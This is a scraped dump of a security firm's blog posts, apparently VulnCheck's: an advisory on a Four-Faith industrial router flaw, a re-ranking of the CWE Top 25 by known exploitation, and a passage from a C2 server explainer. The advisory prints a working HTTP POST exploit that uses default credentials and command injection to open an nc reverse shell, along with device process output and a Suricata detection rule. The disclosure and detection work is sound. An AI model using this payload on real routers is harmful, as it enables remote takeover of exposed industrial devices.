Flaw","https:\u002F\u002Fwww.bankinfosecurity.com\u002Ffour-faith-routers-exploited-using-new-flaw-a-27179","2024-12-30",{"title":58371,"source":14373,"link":58372,"date":58369},"Hackers exploit Four-Faith router flaw to open reverse shells","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fhackers-exploit-four-faith-router-flaw-to-open-reverse-shells\u002F",{"title":58367,"source":32210,"link":58374,"date":58369},"https:\u002F\u002Fwww.careersinfosecurity.com\u002Ffour-faith-routers-exploited-using-new-flaw-a-27179",{"title":58367,"source":32213,"link":58376,"date":58369},"https:\u002F\u002Fwww.cuinfosecurity.com\u002Ffour-faith-routers-exploited-using-new-flaw-a-27179",{"title":58378,"source":11228,"link":58379,"date":58369},"Thousands of industrial routers vulnerable to command injection flaw","https:\u002F\u002Fcyberscoop.com\u002Fiot-command-injection-industrial-routers-four-faith-mirai\u002F",{"title":58367,"source":32216,"link":58381,"date":58369},"https:\u002F\u002Fwww.databreachtoday.com\u002Ffour-faith-routers-exploited-using-new-flaw-a-27179",{"title":58367,"source":32207,"link":58383,"date":58369},"https:\u002F\u002Fwww.devicesecurity.io\u002Four-faith-routers-exploited-using-new-flaw-a-27179",{"title":58367,"source":32219,"link":58385,"date":58369},"https:\u002F\u002Fwww.fraudtoday.io\u002Ffour-faith-routers-exploited-using-new-flaw-a-27179",{"title":58387,"source":25672,"link":58388,"date":58369},"Four-Faith Industrial Routers Vulnerability Exploited in the Wild to Gain Remote Access","https:\u002F\u002Fgbhackers.com\u002Ffour-faith-industrial-routers-vulnerability\u002F",{"title":58367,"source":32222,"link":58390,"date":58369},"https:\u002F\u002Fwww.govinfosecurity.com\u002Ffour-faith-routers-exploited-using-new-flaw-a-27179",{"title":58392,"source":12145,"link":58393,"date":58369},"Critical Flaw Exposes Four-Faith Routers to Remote 
Exploitation","https:\u002F\u002Fhackread.com\u002Fcritical-flaw-expose-four-faith-routers-remote-exploitation\u002F",{"title":58367,"source":32225,"link":58395,"date":58369},"https:\u002F\u002Fwww.healthcareinfosecurity.com\u002Ffour-faith-routers-exploited-using-new-flaw-a-27179",{"title":58367,"source":32228,"link":58397,"date":58369},"https:\u002F\u002Fwww.inforisktoday.com\u002Ffour-faith-routers-exploited-using-new-flaw-a-27179",{"title":58367,"source":32231,"link":58399,"date":58369},"https:\u002F\u002Fwww.paymentsecurity.io\u002Ffour-faith-routers-exploited-using-new-flaw-a-27179",{"title":58401,"source":11233,"link":58402,"date":58369},"Thousands of vulnerable Four-Faith routers threatened by ongoing intrusions","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Fthousands-of-vulnerable-four-faith-routers-threatened-by-ongoing-intrusions",{"title":58404,"source":14390,"link":58405,"date":58369},"Threat actors attempt to exploit a flaw in Four-Faith routers","https:\u002F\u002Fsecurityaffairs.com\u002F172450\u002Fhacking\u002Ffour-faith-routers-flaw-exploited.html",{"title":58407,"source":14378,"link":58408,"date":58369},"Four-Faith Industrial Router Vulnerability Exploited in Attacks","https:\u002F\u002Fwww.securityweek.com\u002Ffour-faith-industrial-router-vulnerability-exploited-in-attacks\u002F",{"title":58410,"source":58411,"link":58412,"date":58369},"15,000+ Four-Faith Routers Vulnerable to Exploits Mostly Due to Default Credentials","TechNadu","https:\u002F\u002Fwww.technadu.com\u002F15000-four-faith-routers-vulnerable-to-exploits-mostly-due-to-default-credentials\u002F563364\u002F",{"title":58414,"source":12149,"link":58415,"date":58416},"New post-authentication vulnerability discovered in Four-Faith industrial 
routers","https:\u002F\u002Findustrialcyber.co\u002Findustrial-cyber-attacks\u002Fnew-post-authentication-vulnerability-discovered-in-four-faith-industrial-routers\u002F","2025-01-03",{"title":58418,"source":14373,"link":58419,"date":58420},"New Mirai botnet targets industrial routers with zero-day exploits","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fnew-mirai-botnet-targets-industrial-routers-with-zero-day-exploits\u002F","2025-01-07",{"title":58422,"source":14386,"link":58423,"date":58424},"Mirai Botnet Exploiting Routers 0-Day Vulnerabilities to Launch DDoS Attack","https:\u002F\u002Fcybersecuritynews.com\u002Fmirai-botnet-exploiting-routers-0-day-vulnerabilities\u002F","2025-01-08",{"title":58426,"source":14382,"link":58427,"date":58424},"Mirai Botnet Variants Exploits Four-Faith Router Vulnerability for DDoS Attacks","https:\u002F\u002Fthehackernews.com\u002F2025\u002F01\u002Fmirai-botnet-variant-exploits-four.html",{"title":58429,"source":12145,"link":58430,"date":58424},"Critical Flaw in Moxa Routers Allow Root Privilege Escalation","https:\u002F\u002Fhackread.com\u002Fmoxa-reports-critical-industrial-router-vulnerabilities\u002F",{"title":58432,"source":58433,"link":58434,"date":58435},"New Mirai botnet targets industrial routers","CSO Magazine","https:\u002F\u002Fwww.csoonline.com\u002Farticle\u002F3716843\u002Fnew-mirai-botnet-targets-industrial-routers.html","2025-01-09",{"title":58437,"source":12149,"link":58438,"date":58439},"Singapore’s CSA issues urgent advisory on Mirai botnet threat to industrial routers, smart home 
devices","https:\u002F\u002Findustrialcyber.co\u002Fcontrol-device-security\u002Fsingapores-csa-issues-urgent-advisory-on-mirai-botnet-threat-to-industrial-routers-smart-home-devices\u002F","2025-01-13",[58441],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":58443,"toc":58570},[58444,58451,58471,58477,58482,58488,58509,58523,58529,58535,58543,58545,58559],[18,58445,58446,58447,59],{},"VulnCheck observed a new post-authentication vulnerability affecting Four-Faith industrial routers being exploited in the wild. The attacker leveraged the router’s default credentials, effectively resulting in unauthenticated remote command injection. VulnCheck has assigned this issue ",[47,58448,24226],{"href":58449,"rel":58450},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-kev?cve=CVE-2024-12856",[51],[18,58452,58453,58454,58457,58458,58462,58463,58466,58467,58470],{},"The attack can be conducted against, at least, the Four-Faith F3x24 and F3x36 over HTTP using the ",[886,58455,58456],{},"\u002Fapply.cgi"," endpoint. ",[47,58459,55030],{"href":58460,"rel":58461},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=EXCLUDE&q=same_service%28services.http.response.headers%3A+%28key%3A+%60Server%60+and+value.headers%3A+%60httpd_four-faith%60%29+and+services.http.response.protocol%3D%22HTTP%2F1.0%22+and+services.http.response.status_reason%3D%22Ok%22%29+or+services.http.response.favicons.shodan_hash%3D%22375199015%22",[51]," finds approximately 15,000 internet-facing devices. The systems are vulnerable to OS command injection in the ",[886,58464,58465],{},"adj_time_year"," parameter when modifying the device’s system time via ",[886,58468,58469],{},"submit_type=adjust_sys_time",". 
The following POST request demonstrates exploitation for a reverse shell.",[1354,58472,58475],{"className":58473,"code":58474,"language":1359,"meta":219},[1357],"POST \u002Fapply.cgi HTTP\u002F1.1\nHost: 192.168.1.1:90\nUser-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F131.0.0.0 Safari\u002F537.36\nContent-Length: 296\nAuthorization: Basic YWRtaW46YWRtaW4=\nContent-Type: application\u002Fx-www-form-urlencoded\nAccept-Encoding: gzip\nadj_time_sec=32&change_action=gozila_cgi&adj_time_day=27&adj_time_mon=10&adj_time_hour=11&adj_time_year=%24%28cd+%2Ftmp%2F%3B+mknod+bOY+p%3Bcat+bOY%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.1.206+1270+%3EbOY%3B+rm+bOY%3B%29&adj_time_min=35&submit_button=index&action=Save&submit_type=adjust_sys_time\n",[886,58476,58474],{"__ignoreMap":219},[18,58478,58479,58480,4606],{},"On the device, the result of the injection can be observed using ",[886,58481,55448],{},[1354,58483,58486],{"className":58484,"code":58485,"language":1359,"meta":219},[1357],"20938 admin     1640 S    sh -c rtc_tm ss $(cd \u002Ftmp\u002F; mknod WaO p;cat WaO|\u002Fbin\n20940 admin     1640 S    sh -c rtc_tm ss $(cd \u002Ftmp\u002F; mknod WaO p;cat WaO|\u002Fbin\n20942 admin     1636 S    cat WaO\n20943 admin     1636 S    \u002Fbin\u002Fsh -i\n20945 admin     1636 S    nc 192.168.1.206 1270\n",[886,58487,58485],{"__ignoreMap":219},[18,58489,58490,58491,58496,58497,58500,58501,58504,58505,58508],{},"For those that have an encyclopedic memory for exploits, this vulnerability should not be confused with ",[47,58492,58495],{"href":58493,"rel":58494},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-kev?cve=CVE-2019-12168",[51],"CVE-2019-12168",". 
While both flow through the ",[886,58498,58499],{},"apply.cgi"," endpoint, they attack different underlying components (CVE-2019-12168 attacks ",[886,58502,58503],{},"submit_type=start"," and has an OS injection in the ",[886,58506,58507],{},"ping_ip"," parameter).",[18,58510,58511,58512,58517,58518,58522],{},"VulnCheck observed ",[47,58513,58516],{"href":58514,"rel":58515},"https:\u002F\u002Fviz.greynoise.io\u002Fip\u002F178.215.238.91",[51],"178.215.238[.]91"," attempting to exploit this vulnerability. Additionally, we note that this November 2024 ",[47,58519,11046],{"href":58520,"rel":58521},"https:\u002F\u002Fducklingstudio.blog.fc2.com\u002Fblog-entry-392.html",[51]," also calls out exploitation of this vulnerability. Their observed User-Agent even matches the User-Agent VulnCheck observed in the wild (although we saw an entirely different payload).",[18,58524,2245,58525,58528],{},[47,58526,2706],{"href":45535,"rel":58527},[51]," team wrote the following Suricata rule to detect CVE-2024-12856 on the wire:",[1354,58530,58533],{"className":58531,"code":58532,"language":1359,"meta":219},[1357],"alert http any any -> any any ( \\\n    msg:\"VULNCHECK Four-Faith CVE-2024-12856 Exploit Attempt\"; \\\n    flow:to_server; \\\n    http.method; content:\"POST\"; \\\n    http.uri; content:\"\u002Fapply.cgi\"; startswith; \\\n    http.header_names; content:\"Authorization\"; \\\n    http.request_body; content:\"change_action=\"; \\\n    content:\"adjust_sys_time\"; \\\n    pcre:\"\u002Fadj_time_[^=]+=[a-zA-Z0-9]*[^a-zA-Z0-9=]\u002F\"; \\\n    classtype:web-application-attack; \\\n    reference:cve,CVE-2024-12856; \\\n    sid:12700438; rev:1;)\n",[886,58534,58532],{"__ignoreMap":219},[18,58536,58537,58538,58542],{},"Finally, pursuant to our ",[47,58539,58541],{"href":58200,"rel":58540},[51],"vulnerability disclosure policy"," for vulnerabilities exploited in the wild, we notified Four-Faith and our customers about this issue on December 20, 2024. 
Questions about patches, affected models, and affected firmware versions should be directed at Four-Faith.",[61,58544,202],{"id":201},[18,58546,53821,58547,1246,58550,1246,58553,53839,58556],{},[47,58548,40447],{"href":53829,"rel":58549},[51],[47,58551,36637],{"href":53833,"rel":58552},[51],[47,58554,35931],{"href":53837,"rel":58555},[51],[47,58557,22211],{"href":53842,"rel":58558},[51],[18,58560,53846,58561,53850,58564,982,58567,1260],{},[47,58562,1233],{"href":2871,"rel":58563},[51],[47,58565,1245],{"href":45535,"rel":58566},[51],[47,58568,216],{"href":214,"rel":58569},[51],{"title":219,"searchDepth":220,"depth":220,"links":58571},[58572],{"id":201,"depth":220,"text":202},"2024-12-27","VulnCheck discovers that a new vulnerability affecting Four-Faith industrial routers has been exploited in the wild",{"slug":58576},"four-faith-cve-2024-12856","\u002Fblog\u002Ffour-faith-cve-2024-12856",{"title":53826,"description":58574},"blog\u002Ffour-faith-cve-2024-12856",[2941,242,1281,23275,1279],"zUxhuJKqn_tu16p50T3UZgJ0kR0kO9dHrDGqbUQpqck",{"id":58583,"title":58584,"articles":7,"authors":58585,"body":58587,"date":58899,"description":58900,"extension":234,"image":7,"link":7,"meta":58901,"navigation":237,"path":58903,"seo":58904,"series":7,"stem":58905,"subtype":7,"tags":58906,"__hash__":58908},"blog\u002Fblog\u002Fcwe-top-25-2024.md","Are the Top 25 CWEs Truly the Most Dangerous Software Weaknesses in 2024?",[58586],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":58588,"toc":58886},[58589,58591,58614,58620,58629,58636,58639,58643,58647,58650,58654,58657,58661,58664,58668,58671,58676,58680,58684,58690,58696,58702,58706,58712,58718,58724,58730,58734,58740,58744,58747,58752,58756,58759,58859,58862,58865,58870,58872,58875,58877,58879,58881],[1920,58590,20],{"id":3520},[22,58592,58593,58596,58599,58602,58605,58608,58611],{},[25,58594,58595],{},"In November, Mitre released the 2024 CWE Top 25 Most Dangerous Software Weaknesses list.",[25,58597,58598],{},"Today, 
VulnCheck issued a report re-evaluating the rankings with a threat-centric approach.",[25,58600,58601],{},"For each CWE, VulnCheck calculated the total number of CVEs, the count of known exploited vulnerabilities (KEVs), and the KEV-to-CVE ratio for the same period covered in Mitre's research.",[25,58603,58604],{},"Findings suggest that while all vulnerabilities can pose risks, Mitre’s list heavily prioritizes vulnerability counts without considering real-world exploitation context.",[25,58606,58607],{},"VulnCheck research repeatedly shows that vulnerabilities known to be exploited in the wild should be treated with urgency and remediated as soon as possible.",[25,58609,58610],{},"The report questions whether CWEs like CWE-352 - Cross-Site Request Forgery and CWE-476 - Null Pointer Dereference even deserve a spot on the list.",[25,58612,58613],{},"VulnCheck also highlights a handful of CWEs that are worth mentioning but not on Mitre’s top 25 list, including CWE-284: Improper Access Control, CWE-843:Type Confusion, and more",[18,58615,58616],{},[68,58617],{":width":10862,"alt":58618,"src":58619},"Vulnerabilities, Exploitation, Exploits","\u002Fblog\u002Fcwe-top-25-2024\u002Fcwe-top-25-2024.png",[18,58621,58622,58623,58628],{},"In November, Mitre released its annual research on the ",[47,58624,58627],{"href":58625,"rel":58626},"https:\u002F\u002Fcwe.mitre.org\u002Ftop25\u002Farchive\u002F2024\u002F2024_cwe_top25.html",[51],"Top 25 most dangerous software weaknesses",". This research calculates a \"danger score\" based on a combination of frequency and severity. 
We thought it would be interesting to re-evaluate the rankings with a threat-centric approach using broader exploitation evidence to see if we could help answer the question, “Are the Top 25 CWEs Truly the Most Dangerous Software Weaknesses in 2024?.\"",[18,58630,58631,58632,58635],{},"To do this, we analyzed CVEs from the same time period and mapped known exploitations to the CVEs associated with each CWE using ",[47,58633,1233],{"href":2871,"rel":58634},[51],", which is a free community resource. For each CWE, we calculated the total number of CVEs, the count of known exploited vulnerabilities (KEVs), and the KEV-to-CVE ratio for the same period covered in Mitre's research (June 1, 2023 – June 1, 2024).",[18,58637,58638],{},"Using these metrics, we created a chart to visualize the 2024 Top 25 Most Dangerous CWEs. To enhance clarity, we applied color gradients to represent the density of each metric, offering a more intuitive view into how these factors might impact the rankings.",[1920,58640,58642],{"id":58641},"exploring-the-cwe-top-25-most-dangerous-software-weaknesses","Exploring The CWE Top 25 Most Dangerous Software Weaknesses",[61,58644,58646],{"id":58645},"mapping-to-cve-counts","Mapping to CVE Counts",[18,58648,58649],{},"We first examined the CVE counts, which appear to closely align with the CWE rankings. This correlation is unsurprising since the count or frequency of CVEs is a core component of the Danger Score calculation. Incorporating severity, as measured by CVSS, has only a marginal impact on the rankings.",[61,58651,58653],{"id":58652},"mapping-to-known-exploitation-vulnerabilities","Mapping to Known Exploitation Vulnerabilities",[18,58655,58656],{},"Next, we explored how known exploitation might influence the Top 25 CWE rankings. 
Using VulnCheck KEV, we counted the vulnerabilities with evidence of exploitation to see how CWEs would rank based solely on the volume of Known Exploited Vulnerabilities (KEVs) published during the same time period.",[61,58658,58660],{"id":58659},"kev-to-cve-ratio","KEV to CVE Ratio",[18,58662,58663],{},"We then calculated the KEV to CVE ratio for each CWE to assess its potential impact on rankings. This calculation provided insights into how weighting CWEs with a threat component could significantly reorder the Top 25 CWEs. We considered using a weighted calculation but decided to keep it simple with the KEV to CVE ratio for this analysis.",[1920,58665,58667],{"id":58666},"a-look-into-the-top-25-cwe-outliers","A look into the Top 25 CWE Outliers",[18,58669,58670],{},"To better analyze the outliers among the Top 25 CWEs, we used a bubble chart for CWEs with 100 or more CVEs and 1 or more KEVs associated with them. This visualization maps the volume of vulnerabilities on the x-axis, the KEV-to-CVE ratio on the y-axis, and represents the number of KEVs with bubble sizes.",[18,58672,58673],{},[68,58674],{":width":10862,"alt":58618,"src":58675},"\u002Fblog\u002Fcwe-top-25-2024\u002Fcwe-bubble-chart.png",[61,58677,58679],{"id":58678},"cwe-outlier-observations","CWE Outlier observations",[993,58681,58683],{"id":58682},"cwes-w-higher-kev-to-cve-ratio-and-lower-cve-count","CWEs w\u002F Higher KEV-to-CVE Ratio and Lower CVE count",[18,58685,58686,58689],{},[295,58687,58688],{},"CWE-798 - Hard Coded Credentials","\nSix KEVs associated with Hitron DVR systems were published with the same description for different products. 
If these were treated as a single CVE, the KEV-to-CVE ratio would drop to 2.73%.",[18,58691,58692,58695],{},[295,58693,58694],{},"CWE-77 - Improper Neutralization of Special Elements used in a Command ('Command Injection')","\nThis CWE shows a high prevalence of KEVs tied to a wide range of noteworthy products, including network devices and ICS equipment. Examples include Ivanti Sentry, Ivanti Connect Secure, VMware Aria, Totolink, Tenda, Palo Alto PanOS, Nextgen MirthConnect, Honeywell firmware, and D-Link, among others.",[18,58697,58698,58701],{},[295,58699,58700],{},"CWE-94 - Improper Control of Generation of Code ('Code Injection')","\nThere is a notable prevalence of KEVs linked to widely used technology and open-source projects. Examples include Apache OFBiz\u002FRocketMQ, OpenMetadata, CrushFTP, Cisco ASA, Microsoft Windows, Citrix Netscaler, Ivanti Sentry, and others.",[993,58703,58705],{"id":58704},"cwes-w-lower-kev-to-cve-ratio-and-higher-cve-count","CWEs w\u002F Lower KEV-to-CVE Ratio and Higher CVE count",[18,58707,58708,58711],{},[295,58709,58710],{},"CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","\nNearly half of the KEVs identified are associated with WordPress plugins. Other notable technologies with known exploitation outside the WordPress ecosystem include Citrix Netscaler, Roundcube (email), and Zimbra (email). 
We noticed that 37% of all CVEs associated with CWE-79 come from WordPress CNAs, making the WordPress plugin ecosystem a major factor in elevating CWE-79 to the top of the CWE’s most dangerous list.",[18,58713,58714,58717],{},[295,58715,58716],{},"CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","\nSeveral prevalent technologies, such as Progress MOVEit, SonicWall Analytics, PostgreSQL, Ivanti EMM, Fortinet FortiClient, and F5 Big-IP, have KEVs tied to this CWE, suggesting it’s deserving of a top spot on the list.",[18,58719,58720,58723],{},[295,58721,58722],{},"CWE-787 - Out-of-bounds Write","\nBased on the technologies impacted and the volume of KEVs, this CWE stands out as one of the more dangerous weaknesses, suggesting it deserves its high ranking. Affected technologies include Google Chrome\u002FEdge, VMware vCenter, VMware ESXi, Microsoft Windows, GNU glibc, Fortinet FortiOS, Rockwell Automation devices, Ivanti Connect Secure, Cisco IOS\u002FXE, Adobe Acrobat, and others.",[18,58725,58726,58729],{},[295,58727,58728],{},"CWE-352 - Cross-Site Request Forgery (CSRF)","\nDespite ranking 4th on the list, only a single KEV was identified for this CWE, which is tied to a WordPress plugin. This raises questions about whether CSRF deserves to be in the top 25, let alone being placed so high on the list.",[993,58731,58733],{"id":58732},"cwes-with-no-exploitation-evidence-during-this-time-period","CWEs with no Exploitation Evidence During this Time Period",[18,58735,58736,58739],{},[295,58737,58738],{},"CWE-476 - Null Pointer Dereference","\nWe didn’t see any evidence during this time period of CVEs with this CWE being exploited. 
The most recent known exploited vulnerability we could find with CWE-476 was published in 2019 and is CVE-2019-10097.",[1920,58741,58743],{"id":58742},"exploring-cwes-by-vendors-with-known-exploited-vulnerabilities","Exploring CWEs by Vendors with Known Exploited Vulnerabilities",[18,58745,58746],{},"We assembled this treemap of CWEs from the top 25 list that includes vendors. Looking at Vendors can help us better understand what vulnerabilities being exploited might be in more broadly adopted technology. We also colorized the treemap based on the KEV to CVE ratio from the research above.",[18,58748,58749],{},[68,58750],{":width":10862,"alt":58618,"src":58751},"\u002Fblog\u002Fcwe-top-25-2024\u002Fcwe-top-vendors.png",[993,58753,58755],{"id":58754},"other-noteworthy-cwes-not-on-the-cwe-top-25-list","Other Noteworthy CWEs Not on the CWE Top 25 List",[18,58757,58758],{},"There are a handful of CWEs that are worth mentioning that did not make the top 25 most dangerous list…",[307,58760,58761,58777],{},[310,58762,58763],{},[313,58764,58765,58767,58769,58771,58774],{},[316,58766,43427],{},[316,58768,10625],{},[316,58770,33855],{},[316,58772,58773],{},"KEVs",[316,58775,58776],{},"Notable Vendor(s) \u002F Product(s)",[336,58778,58779,58795,58811,58827,58843],{},[313,58780,58781,58784,58787,58790,58792],{},[341,58782,58783],{},"CWE-284",[341,58785,58786],{},"Improper Access Control",[341,58788,58789],{},"541",[341,58791,37766],{},[341,58793,58794],{},"Adobe Cold Fusion, Linksys RE7000\u002FE2000, Microsoft Windows, Citrix Content Collaboration, Apache HugeGraph",[313,58796,58797,58800,58803,58806,58808],{},[341,58798,58799],{},"CWE-843",[341,58801,58802],{},"Access of Resource Using Incompatible Type ('Type Confusion')",[341,58804,58805],{},"96",[341,58807,356],{},[341,58809,58810],{},"Google Chrome \u002F Apple OS\u002FIOS",[313,58812,58813,58816,58819,58822,58824],{},[341,58814,58815],{},"CWE-288",[341,58817,58818],{},"Authentication Bypass Using an Alternate Path or 
Channel",[341,58820,58821],{},"33",[341,58823,401],{},[341,58825,58826],{},"Jetbrains Teamcity, F5 BigIP, ConnectWise Screenconnect, Cisco ASA",[313,58828,58829,58832,58835,58838,58840],{},[341,58830,58831],{},"CWE-122",[341,58833,58834],{},"Heap-based Buffer Overflow",[341,58836,58837],{},"357",[341,58839,401],{},[341,58841,58842],{},"Microsoft Windows, GNU glibc, Fortinet FortiOS",[313,58844,58845,58848,58851,58854,58856],{},[341,58846,58847],{},"CWE-74",[341,58849,58850],{},"Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')",[341,58852,58853],{},"141",[341,58855,380],{},[341,58857,58858],{},"Terra Master OS, IBM Operational Decision Manager, Atlassian Confluence",[1920,58860,58584],{"id":58861},"are-the-top-25-cwes-truly-the-most-dangerous-software-weaknesses-in-2024",[18,58863,58864],{},"Our research shows that while all vulnerabilities can be dangerous, the 2024 CWE Top 25 Most Dangerous CWEs heavily prioritize vulnerability counts without considering real-world exploitation context. To address this, we developed an alternative CWE ranking based on the number of Known Exploited Vulnerabilities from the same period, offering a practical perspective on the most commonly exploited weaknesses.",[18,58866,58867],{},[68,58868],{":width":10862,"alt":58618,"src":58869},"\u002Fblog\u002Fcwe-top-25-2024\u002Fvulncheck-top-25-2024.png",[61,58871,13048],{"id":13047},[18,58873,58874],{},"We decided to rank CWEs based on the number of exploited vulnerabilities per CWE rather than the KEV-to-CVE ratio. This is largely because many CWEs have only a handful of KEVs (1-3) and a small number of CVEs (\u003C100), which makes the ratio volatile. If we were to rank based on a scoring system in the future, we would definitely want to consider using weighting in the calculation. 
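The post ranks by raw KEV count because the plain KEV-to-CVE ratio lets a CWE with one KEV among a dozen CVEs outrank one with dozens of KEVs among hundreds. The following added example, which is not VulnCheck's analysis code, computes the three metrics the post describes per CWE and compares ranking by KEV volume, by raw ratio, and by a small-sample-aware ratio (the lower bound of a Wilson confidence interval), which is one concrete form the weighting mentioned above could take. The CVE and KEV counts are constructed for the demo and are not VulnCheck KEV figures.

```python
"""Added example, not VulnCheck's analysis code: per-CWE CVE count, KEV count
and KEV-to-CVE ratio, plus three rankings (KEV volume, raw ratio, Wilson lower
bound). The counts below are constructed and are not VulnCheck KEV figures."""
from math import sqrt

# Constructed sample: CWE -> (cve_count, kev_count) for one reporting period.
SAMPLE = {
    "CWE-79":  (5000, 20),   # huge CVE volume, comparatively few KEVs
    "CWE-787": (900, 40),    # most KEVs in absolute terms
    "CWE-352": (1200, 1),    # high in the Mitre list, almost never exploited
    "CWE-798": (10, 1),      # tiny population, so a single KEV is 10%
    "CWE-94":  (400, 25),
    "CWE-476": (500, 0),     # no exploitation evidence
}


def kev_ratio(cves, kevs):
    """Plain KEV-to-CVE ratio; an empty population scores 0."""
    return kevs / cves if cves else 0.0


def wilson_lower_bound(cves, kevs, z=1.96):
    """Lower bound of the 95% Wilson interval on the exploitation rate.
    It shrinks toward 0 for small populations, so 1 KEV in 10 CVEs no longer
    outranks 25 KEVs in 400."""
    if cves == 0:
        return 0.0
    p = kevs / cves
    z2 = z * z
    denom = 1 + z2 / cves
    centre = p + z2 / (2 * cves)
    margin = z * sqrt(p * (1 - p) / cves + z2 / (4 * cves * cves))
    return max(0.0, (centre - margin) / denom)


def rank(data, key):
    """CWEs ordered most-to-least dangerous by key(cve_count, kev_count)."""
    return sorted(data, key=lambda cwe: key(*data[cwe]), reverse=True)


def rank_by_kev_count(data):
    return rank(data, lambda cves, kevs: kevs)


def rank_by_ratio(data):
    return rank(data, kev_ratio)


def rank_by_wilson(data):
    return rank(data, wilson_lower_bound)


def metrics_table(data):
    """Rows of (cwe, cves, kevs, ratio, wilson_lower_bound) for a report."""
    return [(c, n, k, kev_ratio(n, k), wilson_lower_bound(n, k))
            for c, (n, k) in data.items()]


if __name__ == "__main__":
    for cwe, n, k, r, w in metrics_table(SAMPLE):
        print(f"{cwe:8} CVEs={n:5} KEVs={k:3} ratio={r:7.2%} wilson={w:7.2%}")
    print("by KEV count:", rank_by_kev_count(SAMPLE))
    print("by ratio:    ", rank_by_ratio(SAMPLE))
    print("by Wilson:   ", rank_by_wilson(SAMPLE))
```

On this sample the raw ratio puts CWE-798 first on the strength of one KEV, while the Wilson bound pushes it below CWE-94 and CWE-787, whose exploitation rates rest on far more evidence; CWE-476, with no KEVs, stays last under every ranking.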
We encourage others to research as well.",[61,58876,202],{"id":201},[18,58878,205],{},[18,58880,208],{},[18,58882,211,58883,217],{},[47,58884,216],{"href":214,"rel":58885},[51],{"title":219,"searchDepth":220,"depth":220,"links":58887},[58888,58889,58890,58891,58897,58898],{"id":58645,"depth":220,"text":58646},{"id":58652,"depth":220,"text":58653},{"id":58659,"depth":220,"text":58660},{"id":58678,"depth":220,"text":58679,"children":58892},[58893,58894,58895,58896],{"id":58682,"depth":1266,"text":58683},{"id":58704,"depth":1266,"text":58705},{"id":58732,"depth":1266,"text":58733},{"id":58754,"depth":1266,"text":58755},{"id":13047,"depth":220,"text":13048},{"id":201,"depth":220,"text":202},"2024-12-19","In November, Mitre released the 2024 CWE Top 25 Most Dangerous Software Weaknesses list. Today, VulnCheck issued a report re-evaluating the rankings with a threat-centric approach.",{"slug":58902},"cwe-top-25-2024","\u002Fblog\u002Fcwe-top-25-2024",{"title":58584,"description":58900},"blog\u002Fcwe-top-25-2024",[1280,1279,58907],"cwe","1OPvWSy0HFg1MF1RG5FWbqxr30USJZJx0zloRSxK9zk",{"id":58910,"title":58911,"articles":7,"authors":58912,"body":58914,"date":59174,"description":59175,"extension":234,"image":7,"link":7,"meta":59176,"navigation":237,"path":59178,"seo":59179,"series":59180,"stem":59181,"subtype":7,"tags":59182,"__hash__":59183},"blog\u002Fblog\u002Factive-c2-servers.md","Active C2 Servers",[58913],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":58915,"toc":59166},[58916,58918,58926,58929,58932,58936,58939,58942,58950,58958,58966,58969,58973,58976,58983,58986,58989,58997,59000,59003,59009,59012,59015,59019,59022,59030,59038,59046,59054,59058,59066,59076,59085,59093,59102,59110,59114,59117,59125,59133,59141,59149,59153,59156,59164],[18,58917,44358],{},[22,58919,58920,58923],{},[25,58921,58922],{},"What C2 Servers are and how they function",[25,58924,58925],{},"Examples of how C2 servers are vulnerable and exploitable targets and 
how attackers can exploit them",[18,58927,58928],{},"Command and Control (C2) servers represent the digital nerve centers that attackers use to communicate with their malware, orchestrate attacks, and manage compromised systems.",[18,58930,58931],{},"When a C2 server is \"active,\" it signals that an attack campaign is underway, making it an urgent priority for defenders to identify and neutralize.",[61,58933,58935],{"id":58934},"what-is-a-c2-server","What Is a C2 Server?",[18,58937,58938],{},"At its core, a Command and Control (C2) server is a system or infrastructure that attackers use to maintain control over infected devices (commonly referred to as bots or zombies).",[18,58940,58941],{},"These servers are the backbone of malicious campaigns, serving several purposes:",[18,58943,58944,58947,58949],{},[295,58945,58946],{},"Sending Commands",[1823,58948],{},"\nAttackers use C2 servers to issue instructions to compromised systems.",[18,58951,58952,58955,58957],{},[295,58953,58954],{},"Receiving Data",[1823,58956],{},"\nInfected systems send stolen data, such as login credentials or intellectual property, back to the C2 server.",[18,58959,58960,58963,58965],{},[295,58961,58962],{},"Orchestrating Complex Attacks",[1823,58964],{},"\nC2 servers facilitate coordinated efforts, such as launching Distributed Denial-of-Service (DDoS) attacks or deploying ransomware.",[18,58967,58968],{},"When a C2 server is active, it indicates that the attacker is currently engaged in managing the campaign, posing an immediate threat to any connected systems.",[61,58970,58972],{"id":58971},"why-are-active-c2-servers-so-dangerous","Why Are Active C2 Servers So Dangerous?",[18,58974,58975],{},"Active C2 servers are particularly dangerous because of their role in real-time attack execution. 
Here’s how attackers use them to carry out key phases of their campaigns:",[18,58977,58978,58980,58982],{},[295,58979,44181],{},[1823,58981],{},"\nData exfiltration refers to the unauthorized transfer of data from a victim’s network to the attacker’s C2 server.",[18,58984,58985],{},"After compromising a system, malware sends sensitive information—such as credentials, financial data, or proprietary files—to the active C2 server. This data is often encrypted to evade detection during transit.",[18,58987,58988],{},"Exfiltration not only compromises sensitive information but can also lead to financial losses, reputational damage, and regulatory penalties for the victim.",[18,58990,58991,58994,58996],{},[295,58992,58993],{},"Ransomware Payload Installation",[1823,58995],{},"\nRansomware is a type of malware that encrypts a victim's data and demands payment for decryption.",[18,58998,58999],{},"Active C2 servers deliver ransomware payloads to infected systems. Once installed, the malware locks files or entire systems, rendering them unusable until a ransom is paid.",[18,59001,59002],{},"The immediacy of ransomware attacks can bring organizations to a standstill, disrupting operations and potentially exposing sensitive data if attackers threaten to leak 